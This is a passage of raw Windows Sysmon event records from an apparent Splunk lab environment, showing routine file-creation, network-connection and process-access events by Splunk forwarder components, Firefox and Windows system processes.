Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0586F821D32415A90FF6A46964B5F51,SHA256=D6BA58FDAF512E403188FEA98F030A91D1B2B8222413B3D839D5C06585B1437F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805707Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:20.412{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57131-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000805710Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:23.950{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B45315413DE1B814755FBE9AFDAFF656,SHA256=A6582118738CED8B8479E02C6B613E2670CF197D97D2BBD9E3ECACCA84B74EB4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:15.756{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50878-false10.0.1.12-8000- 23542300x80000000000000001045508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.597{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CA4D6104E819A88412E05BA7D8C50D9D,SHA256=61FC1B5DC4E51C242E227263DE04DBFE21CB17708DCE4D5E882F25471E124191,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.597{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C29D6ED0737A3B748811F1A336531480,SHA256=A8CBF5B4372EF171380BCB10C6C890F79B8DD3BBB6E5FBBCE13E379ABF171F6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.582{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=04F1483EB500F7DD5DBFCB7E81C66B30,SHA256=D4C50DF4E733C42E32CD034B5835FEF7F2B5DE98A642DA0EA4EEF030F15B49E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.582{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CE5AB7E61AF0F3DE5FBB6FF4B849DEDF,SHA256=8E851FF5DF60BE84AD1F9B65BED48310082BC6D293321D694A3EF749D6A115F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.582{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=55030877845160C36324D191D140078C,SHA256=E8912AD66F83B605A72A81017E5FF3B2ABAB7EE265A12CC5068304D1C4F352D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.582{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=964C3FEC98E97ABA6FDF704D588DF532,SHA256=52753C9740F5615179FFE924AC746AE6310C0A6A24F4FA361F643A21BAFC63FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.582{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=12565593B8B39100395CED136B1C853A,SHA256=B1B4FDA69CD1608DAA622DDA8E6F607DE85459FC751334E02D5561B0C5AF117F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.566{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=692BCE6277272CD8850B3A4F6AF96D31,SHA256=AFFE021C26EDD1C32AE538D1256ED9449AADAD3B32702B75AA5BA4BCA54C0D8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.566{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DE713F5D008133E2C57A986B3BFDC51B,SHA256=7315FDA825B39F94D09A4C3C3DF547FA26325889E2B71C82A52576DD5628062C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.566{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CF3093BCD820CB24E9AAC36B1CA8A81F,SHA256=2E8D846228239446FED20C7CEDE0CBF2CCAD98B1550CEAAACBF7DD9D0AD2F196,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.566{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4D0FFB1CAEC8B7011519BBBF0A785BBE,SHA256=E1349C7F2B5EDDF1C1A43E816F8AC4ABF44886DA7F62160F32223CD7B88ED852,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.566{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=09BF2AC8B3EEA61B2E295A7990FFEE1C,SHA256=0D5FEE5D92AC7AA44120276EB8909AA80D34F3E28B8ABF4E435B919CB0FD2946,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8115E1DDDC577B4525039501D885A2A5,SHA256=C9C4E3E383BF7AAA7699D396AA111F6D2E3BEC650B964979C361B0589B027142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=246BBD7D35447F27A53D7AC39A11BDE3,SHA256=E856245818F7D48949E92EF5824C103291D6277DD5AF4531087A2F7950F40AC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E9A693C0C475C63677A1390620BEB866,SHA256=B1CB0280987030EC8AFFEB30CFC9EEE44E26C17C4E032F995AA24BBDD7534D5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=240BB9AA5BFD2F0FF4DF287D61B3F5B2,SHA256=D3BF746D71FC600759CFC15D33C4F6FF1AD8A76E970E32428249D7775D62A11F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7A2E3AB6BA19DE38ECDF0BB634C4D2F6,SHA256=1CD1852FEE81A3545C852CCEC78D4C1379D1A1AF8E7C5102A915E7330DF16EB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E2C7DCF0CB87DB81F61A4B5FBE6F333A,SHA256=0D0370F9CDCD478D20BF88B1BFD416138A37BD72892ABC8202C732FB79C907DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C9B3EC857B0ABFD9E75264ACB923AFA7,SHA256=B0C51B59DA5F08CDCAD7B227A9F1840C909D9F33FB01B80809EC4B2B371FEDFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7A5255A9AA5BB65A34C76103971F010E,SHA256=6E459AEDB557904224352426DED7743F7F36D792E7D6C6AD1F9A1C1F3BE05D61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4F6C7A0A4D033B01AA9CCB838420ACAE,SHA256=590DF34EE1706829242A2BFDDA1564D393D078B1FF8617A8ABFD449A32E36FFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DF96051058A603AE0207DE636EC8B266,SHA256=57F57EDB02886535037E10C6D21C40B200E7DD61633DD2235A749075142C9CE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.297{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11B6CFAD0ECF325F6A8436F957EDA816,SHA256=7F73BC224372F6702EECE5B2D6D2BE22550D663AD11390D4444C972ABEFCF818,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805709Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:22.286{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57132-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001045510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:24.318{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E39589DE81FCA5EC37CE50416B63C49,SHA256=04EC0C0E9EEE4C467EC9064BA6CC23755003EE9F4E56C99CDEB2CFF4B63742B9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805737Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.919{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F260-60EB-2E79-00000000D001}1432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805736Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:24.919{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805735Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.919{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805734Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:24.919{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805733Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.919{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805732Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:24.919{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805731Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.919{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805730Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:24.903{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805729Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.903{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805728Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:24.903{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805727Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.903{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F260-60EB-2E79-00000000D001}1432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805726Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.903{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F260-60EB-2E79-00000000D001}1432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805725Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.904{0C1E0330-F260-60EB-2E79-00000000D001}1432C:\Program 